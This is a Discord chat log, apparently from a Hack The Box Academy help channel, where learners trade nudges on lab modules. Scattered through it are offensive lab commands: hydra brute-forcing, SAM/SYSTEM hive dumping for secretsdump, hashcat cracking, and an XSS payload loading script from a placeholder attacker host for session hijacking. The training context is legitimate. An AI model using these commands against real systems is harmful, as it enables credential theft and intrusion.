I've tried the payload example and changed the resource=index.php to upload.php but it didn't have any effect
But again it will stay the same amount because tier 0 is actually cost 10 cubes
right
but most of the time you get 20% back from the total cost of the module once you complete it
I will complete current module and see it again
Hi, I have been doing the Password Attacks Lab -Hard. I have tried to bruteforce the mutated password list filtered by length >=10, hydra cracked for R* service. However, the password doesn't work when I try to connect to the service using the password. I have been running crackmapexec on another S* service. But it is taking too long.
I just tested it again, they provide how to do it in the section. you can DM me if you need help.
crackmapexec command completed, but it couldn't find anything for S* server. Any hints would be highly appreciated!
rdp is indeed the foothold
i've heard crowbar is better for rdp than CME or hydra
also idk where you got the password would be >=10 chars
i'm looking at the pw in my notes: it's definitely less
From previous labs 😦
previous labs are independent in this instance (and most other instances)
basic rule of engagement: don't make assumptions
the password attack module definitely misleads you in the length of the passwords
it says to enumerate the password policy, how important it is, then completely ignores it later
even still i think you can do some enum to find min password length as i'm seeing in my notes that RPC is open
I know. I had checked the forums and they had stated that the password policy is length >=10, to increase the speed. So, I thought it would apply here as well. Turns out I am wrong 😦
it also says most passwords are x long and ignores that too
yeah
¯_(ツ)_/¯
obv not stating the pw length but unless i have it copied wrong; it's definitely <10
Thanks. I will try again
okay thanks will do! ima try
1
if i subscribed to the htb academy can i get access to the premium in htb labs
no
that's currently not a feature; but might be one in the future
given that they now do SSO
but atm still separate subscriptions and separate platforms
ok thx
Ok so,I got total of 40 cubes
Completed 9 tier 0 modules
your cube total will never increase by just doing modules
also make sure you fully complete a module and there's no sections or questions you missed
you should get a "finish and complete" button at the end
I'm pretty sure that I completely every section
just go through and click the green button that says "Mark Complete & Next" at the end of each section
That can happen?
?
You must made sure it said "finish and complete"?
working on the file upload assessment and I've inspected the upload.php to determine the upload constraints. when I formulate my POST request I can print out the /etc/passwd, but when i try to filelist the root directory to find the flag name i just get a black reply. Any pointers to a kb online?
Pls is this the right place to ask questions relating to academy modules
Yes
You add the section and module where you stuck.
You type your question
If there is some spoiler stuff with example names and password you can hide em like b**, ppl who did the section will know
thank you guys for your hard work, i have a question please
I need to be able to list the root directory, but what doesn't appear to work is xxe directory listing, I just get the <svg></svg> response instead of a directory listing of the root dir. I assume that means I should try a different technique.
have been trying to download LinEnum on target host using wget while python server is running on my host but it keep retrying is there a way out
am at Nibble privilege Escalation
How are you trying to download it? Directly from github?
If so: the targets don't have internet access
wget http://my host ip:8080/LinEnum
wget http://my/ host ip:8080/LinEnum.sh
while am running python3 -m http.server 8080 in LinEnum directory
Anyway: is linenum 1: spelled like that and 2: in the directory you started the http server from
Do you see the request come through?
oh okay space on the target machine is there way out i need to get root privilege
?
Then you're likely not inputting your ip correctly
http://10.10.x.x:8080
Unless you're meaning to tell me you're literally typing "my ip"
Can anyone give me a nudge for the file uploads skills assessment. I have be able to view the filtering logic in upload.php, and was subsequently able to download the /etc/passwd data, but for some reason a file listing through xxe doesn't work it just displays a blank output <svg></svg>.
You don't need to repeat yourself
You might need to try something different
i put in my kali ip not the vpn ip
That'll do it
I just wanted to double check this, Attacking Common Services - Attacking FTP.
I've used the resource user and pws list files with medusa and got nothing, tried with hydra and got nothing
hydra -L <user list> -P <password list> target IP ftp -s <non standard port> -t1 -w10
Are we supposed to use the resource password list or rockyou
Rockyou would take forever
Its silly how long its even suggesting haha
23907:19h
it's already taken ages to go through the whole user list from resources once, as it is
Did you try ||anonymous||
yep
Doesn't sound like it
didn't work, according to nmap results also thats not possible
It should
ill try it again
sigh
Thatll do it
Thanks ML
i think my first attempt at that was not correct obviously
You were trying to log into 21 anonymously
yep I think that would be why
Which, yes, was not feasible
Does it count optional exercises?
But even if it count,I only had a module that doesn't complete them
Yes
But those you generally type "DONE" and submit
T0 modules will always give you the cubes back you spend
So I need to check and complete them
T1 and above give 20%
Can i enroll my university in htb or it must be done by one of the uni staff?
Never said it did
For academy stuff? You'd have to message support
Then how I gonna increase more cube if I can't reach T1 in the first place lol
Sad
Buy a subscription
Completing modules will never give more modules than you spend
So I actually misunderstood all along
As shown in that table: you spend x cubes you get y cubes upon completion
(And throughout the module in some cases)
Oh and one more question,but it may not related here
Where can I see info about discord role in this server?
Yes, but also where can I see/read all role info?
in the module windows priv escalation section Windows Built-in Groups, i have the flag, but understand something not in this section.
what can i do with after i did:
C:\htb> reg save HKLM\SYSTEM SYSTEM.SAV
The operation completed successfully.
C:\htb> reg save HKLM\SAM SAM.SAV
The operation completed successfully.
You can use secretsdump to extract passwords from the files SYSTEM.SAV and SAM.SAV
New to HTB? Need help getting started? Check out this article for a full introduction to the platform!
Thanks you
the first section would be Interactive Section right?
so why does it say its incorrect?
No
wdym?
The first section is not, in-fact, interactive section
Look two up lmao
Each module is broken down into pages/sections
Interactive sections isn't the first page of this module
Green check mark means you've completed that section
im getting a sense of tiredness im not sure why
yes and?
You've completed the first two sections
yes
Because it seems like you know English, so you're just bad at reading
the Introduction
✨
Without "the"
Yes as the first section
Yeah, and the table of contents is a list of sections.
Every item on the right side there is a section.
Go figure, the table of contents has all the sections
ohhh cuz i thought the list of cubes were subsections
Nope
im so stupid
Those just means completing that section gives cubes back
Yes 🗿
goodbye
Generally
@solid python can i Ask you something quick about the command injections module ? for the skill assessment ? i would be so happy 😄
those moments are the exact moments where you get smarter
I haven't done that module
i think im losing brain cells rn
ok no problem 😄
You can't live life without being wrong.
Take it slow, and read carefully. Genuine advice
so the workstation is the vm?
It can be
Its a little weird in academy and labs
they offer an "in browser" virtual machine called PwnBox
this is what i have on my screen
Yep, thats pwnbox
The workstation is generally the pwnbox or your own vm
Brother why do you still have internet explorer
I recommend using your own rather than the browser one, because the browser one is timed
so is PwnBox a Linux system
school ahh pc
Yes
and ik its dead
Ah if it's a school system then you're definitely limited on what you can install
Did your school give you this PC? Do you own it or does the school?
school
and its a desktop pc so
Yeah you won't be able to install your own VM on it
Imagine doing htb while in school
Virtualization in macbooks is possible but might require more involved configuring
no its after school
Virtualbox and VMware exists for MacBooks, free at least
ok thats good to know
UTM is paid
macbooks are limited ngl
But iirc you can update it to 6.0 after
A terminal that runs bash
Like how powershell is its own terminal
A terminal is just a command line interface that is running an interpreter
is there anything you guys would recommend doing or learning between finishing infosec fundamentals and starting cpts?
Practicing patience /gen
well there's already been plenty of that on this path and there will be even more in cpts
Also be prepared to overthink a simple question because of wording
"Authenticate to" can mean many things
already do all the time
i think i'll finish the cisco networking course and probably start python between infosec fundamentals and cpts
I would genuinely tell you to focus on one thing at a time
so don't finish the cisco networking course or don't do python and cpts at the same time?
i'm not going to start the cisco networking course until i finish infosec fundamentals if that's what you thought i meant
Im working on the XSS module and I've been trying to get a response on either Netcat or PHP server for Session Hijacking. I've set up the script.js and index.php as instructed in the module. I've been going through all the User Registration fields and I haven't been able to get a single response on my PHP or NC listeners. I've tried all the payloads <script src=http://MY_IP:PORT/script.js></script>, etc. I've gone through a handful of the PayloadForAllThings and nothing has been able to reach back. There is something I'm missing and I'm not seeing it for some reason. My script.js script is also the one provided by the module and I made the change for MY_IP:PORT.
i feel you 🥲
Don't do python and cpts at the same time
Those skills don't really correlate much
Disregard my question. I had an extra ' and I got my buddy to look and he saw it instantly xD
So you're spending tons of extra time splitting your brain function
ok that's interesting because weren't you in the conversation last night where i was asking why you would need to make your own tools and people were saying it's important to learn how they work
Yes, but cpts literally uses pre-made/out of the box tools
yeah i know and that's why i don't understand how making your own tools fits in besides learning how the tools work
anyone help "PoC and Patching - Unexpected Input" in the "Parameter Logic Bugs" module?
It is more difficult than skill assessment for me...
Cpts path also does a decent job at explaining the concepts
i guess i'll see what cpts has to say about python
So you're not just dropped into here's a tool with no concepts
doesn't cpts have an intro to python module or is that a different path
Almost nothing
Different path
shit
Cbbh is the coding one
cbbh has all the same modules as cpts and cdsa except for like 5
Cbbh is the coding/web pentest cert
Introduction to Python 3 is not in the Bug Bounty Hunter job role path
It is in my heart
it honestly should be
oh intro to python is only in the intro to binex path
maybe i'll just do that module after i finish infosec fundamentals just to get a basic grasp on the fundamentals
Python fundamentals aren't necessary for CPTS
You don't really do much full on coding
Just adjusting one liners
Or slapping a php in
yes, the classic nc tty upgrade
Stucko works for everything
ok what the hell should i learn python or not
and i mean yeah there isn't a lot of coding in pentesting but there's plenty of scripting
fair enough
Because nothing is gonna be reinforced
ok so i really want to learn python but if it's not necessary for cpts should i just learn it after i'm finished with cpts?
Sure
Like I'm not saying you can't do it at the same time
I'm just saying your knowledge isn't gonna be continually reinforced through practice with it
This is what I do. As people mentioned coding requires lots of brain power, I dont really like splitting it with something else.
So Sunday I take a break from pentest study and dedicate it fully to building python projects.
Does value in this context mean the string "value" or does it mean any non-zero number?
Hey All, I'm having a bit of trouble on question 3 of the "Skills Assessment - Using Web Proxies". I've managed to get a flag to show on multiple responses after using intruder to find the last value of the md5 value received from question 2. But the htb flag is not accepted. Does anyone happen to know what that question is actually looking for?
@next bronze
it's right there
which icon is it?
click on them to find out
I alr did lol
it's the green one
Not one of them is labeled Bash Terminal 🗿
For future reference what are some bash terminals called?
Does one look like a terminal with a bash symbol?
idk what's a bash symbol
I'm so dumb
Google it
Oh the dollar sign?
Uhu
Yo im new to this in gen, only did some HTML stuff for a course anyone know where to start and how i can get situated?
Im interested in learning a new skill
anyone for a nudge on question #3 NTLM Relay attacks skills assessment?
check shares and try passwords
Module: Attacking Common Applications, Section: Attacking Tomcat, Question: i have planted a WAR payload and successfully got a reverse shell, however I am unable to locate the Find and submit the contents of tomcat_flag.txt I have used ls -al, however I still could not find the flag. I will appreciate a nudge.
right in front of my face as always. not sure how I made it this far in life
dollar sign
imagine money
oooof
discord not loading all, someone already answered
still appreciate it
i don't appreciate it
honestly if i get to rock bottom and i just somehow cant get out and its over, i might become like serial killer or smth
btw appreciate u have pentest certificate
this shit must be jard
hard*
@remote latch yo I feel that but maybe you should talk to someone about that bruh
nah,thats the last option
anyone could give me a nudge on this?
🗿
module isnt that hard just being complacent
ngl dont feel bad for urself
listen to some music or smith
@limber river will you be my mentor wolfie?
hashcat keeps hitting me with insufficient memory, is there a way to clear this or bypass?
im using the attack linux host i was tasked with ssh'ing into
but i also tried to do it on my kali vm
both hit me with it
yeah don't use a vm
tried "hashcat -m 5600 filename /usr/share/wordlists/rockyou.txt" ... i dont have another option but a vm unless i build a dedicated linux host
use your current computer?
are you running your vm on a type 1 hypervisor?
you should just be able to download it to your computer
its running on vmware fusion
then use that host machine
Multi-OS (Linux, Windows and macOS)
World's fastest and most advanced password recovery utility
I always use it on a vm

Ooooh. And well
We all know linux and gpus aren't really friends
Well i guess time to switch. Till now i never had problems

I use my VM for most all hashcat and john use. There's only been a couple of times I needed to use my host to move things along.
Yo
Ig your cpu is built different
13gen i7 ¯_(ツ)_/¯
But same. 10 year old cpu amd still trucking along
@next bronze didnt nvidia recently hire the one responsible for the GPU open source for linux stuff?
So either we get support or they want to slow their project down
mayhaps
im rocking i7 aswell
Next month a full new pc incoming
for the "credential hunting in linux" section of password attacks, is the hint required to solve the exercise
https://www.techpowerup.com/321646/long-time-linux-nouveau-driver-chief-ben-skeggs-joins-nvidia
Found it. I think this was it
It feels that way, yeah
oh that's recent, we'll see how it goes
Yea i just saw it today randomly
Otherwise you're running a username and password list for likely an hour before it pops
having the same prob rn after running the exe again still not getting them files as it's written in the module
https://academy.hackthebox.com/module/143/section/1279
the parrot box is fucked, trying to rdp into ms01 (3rd question) and xfreerdp hits me with an error asking me to check the $DISPLAY variable
i do "echo $DISPLAY" and there's nothing set
after some googling, people say to set $DISPLAY=:0
It's because you're doing it as root most likely
im in as htb-student
Also xfreerdp can't be run from an ssh session
save yourself a headache and just make a tunnel to your main box, much easier to work off your own than the parrotbox
it did mention rdp in the paragraph, let me do that. I didnt know you couldnt do xfreerdp from ssh
yup that worked, marcielee, you're always saving me from my self! i ❤️ u
Hi everyone! I'm stuck on the exercise for php typejuggling auth bypass. Any help would be greatly appreciated 🙂
Were you ever able to find this? Having a ton of issues with it as well
Any nudges on CDSA SoC Analyst path "Yara and Sigma for Soc Analyst" Hunting Evil with Yara (Linux edition) " Study the following resource https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html to learn how WannaCry performs shadow volume deletion. Then, use yarascan when analyzing "/home/htb-student/MemoryDumps/compromised_system.raw" to identify the process responsible for deleting shadows. Enter the name of the process as your answer."
Adding any of the processes mentioned within the .yar dont change output for me at all. Pretty stumped on it atm

the idea is to figure out what is the main process that spawns the subprocesses that do all the VSS stuff
i haven't done this module; so I can't offer more guidance than that
Guys i already found the high-risk vulnerabilities but i dont know how i find the flag, can someone help me?
Using web proxies Module-ZAP Scanner
well you use the vulnerability to find the flag
Yeah, but how i keep looking for it after that, that's my question
well the flag.txt is at the server root
so find a way to read/access the server root
I'm doing linux Priv esc and i found the correct version, how its not taking my input
how have you written it out? x.x.x?
like this 1.1.1, Python 1.1.1
Yeah thats what I'm currently stuck on. I'll look into what Fed linked when I get back to it. But every process I would include in my .yar would do nothing. But again, I gotta read that new article
python3 --version will give you the latest version
i got the version already its just not taking my answer
ah roger
Is it asking for Python[version] or just [version]
Are you sure it doesn't just want version x.xx
tried that
has anyone done zephyr
there are other ways to find version installed like via apt list
#prolabs-zephyr ; read and follow #welcome to access and ask your question there
can't authenticate, i've reached out to some admins via dm but no help yet :/
I was looking at the wrong vulnerability...
ty !
good night
Then be patient
lol
they do a pretty good gotcha on ya huh
If you still need help, send me a DM
i am doing Attacking Common Applications section Attacking Thick Client Applications, i cant seem to find the option to dump memory into file
i have clicked on the address then right click like the module says but it doesnt show the option for dump memory into file
Run as admin maybe?
it is running as admin
¯_(ツ)_/¯
Working on the file uploads assessment. I managed to bypass the upload filters and have uploaded an image containing webshell. based on the details in upload.php, I have identified the file rename pattern and folder location of the file. The file upload in the form is successful, and then when i submit the overall form in theory the renamed file should be present in the folder but I am getting a 404 not found message instead. Can I confirm details with someone who has solved
sure
Thanks for your time
anyone know how to run sqlplus command? i cant run in their sandbox environment. not sure how to get it running. Would need help for the module:( footprinting > oracle tns )
Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.
Hello! Extreme beginner here trying to understand subnetting. (Apologies in advance as this is going to be a bit lengthy of a question.) Can someone help me understand why the networks between these two questions appears to be different?
**3.** Submit the broadcast address of the following CIDR: 10.200.20.0/27
**A:** 10.200.20.31
**4.** Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.
**A:** 10.200.20.16
My understanding: (Please correct errors in my logic)
For question 3, three host bits are already reserved indicated by the CIDR "/27" (27 % 8 = 3). This leaves 2^5=32 available hosts for IPs (with the first and last as network and broadcast addresses), so 10.200.20.0 clearly falls into the first subnet and broadcast address makes sense as 10.200.20.31. (As a bonus, this network should be able to hold 8 subnets all under the subnet mask of 255.255.255.192, each with their 30 available host IPs, right?)
For question 4, the network is exactly the same. I can't logic through how I got to the answer 10.200.20.16. My only guess is that I assumed that the subnet from 10.200.20.0 - 31 was being split into 4 additional subnets, which is the only way I can see 10.200.20.16 being the first address of the third subnet. But is this a thing?
Can you have subnets within subnets? What might I be misunderstanding?
HI everyone! I'm having some trouble identifying the given hash type in the whitebox attacks skills assessment. Both Hashid and hashcat have been unable to render the correct type for the given hash/password. Could anyone provide a nudge? I'd be forever in your debt 🙂
i am doing Attacking Common Applications section Attacking Thick Client Applications, i cant seem to find the option to dump memory into file
i have clicked on the address then right click like the module says but it doesnt show the option for dump memory into file
figured it out
just popping back in--at the 95% marker, week 23 :3
Windows PrivEsc is so interesting
Dude I loved this section!
LMAO its alright for me
LOL
It took me like 2-5 days of pure repetition in reveng and debug. Can't believe this was part of fatty.
loll it was a pain




who uses own computer for big lists